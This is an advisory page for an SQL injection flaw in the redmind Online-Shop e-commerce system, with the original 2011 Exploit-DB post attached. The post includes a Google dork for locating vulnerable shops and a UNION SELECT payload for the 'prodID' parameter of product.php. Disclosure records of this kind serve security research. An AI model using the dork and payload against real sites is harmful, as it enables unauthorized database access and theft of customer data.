redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability

vendor:

Online-Shop / E-Commerce-System

by:

Mbah_Semar

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Online-Shop / E-Commerce-System

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux IDBlackcoder

2011

redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability

A SQL injection vulnerability exists in the redmind Online-Shop / E-Commerce-System, which allows an attacker to execute arbitrary SQL commands via the 'prodID' parameter in the 'product.php' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

[#] Exploit Title	: redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability
[#] Google Dork		: "powered by redmind�" or "Entwickelt und betrieben von redmind�"
[#] Software Link	: http://www.redmind.de/online-shop.html
[#] Version		: N/A
[#] Tested on		: Linux IDBlackcoder
[#] Date		: September 28th, 2011
[#] Author		: Mbah_Semar
[#] Homepage		: http://www.blackcoder.or.id | http://www.blackhat.or.id

#####################################################################[ Vulnerable File ]	http://www.example.com/product.php?prodID=[SQLi]
[ Example ]	http://www.example.com/product.php?prodID=9999 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
#####################################################################
[Thank's to][*] All member and Staff Indonesian Blackcoder[*] My Master : sudden_death (terimakasih atas ilmunya)[*] Special to ex member suramcrew: Kodok ijo, Gisa Maho, Lukas Bling, Pasukan dari Sempax, Zero-Line, Aanz, anharku, hakz
[Note][*] Aku sayang Ibu :)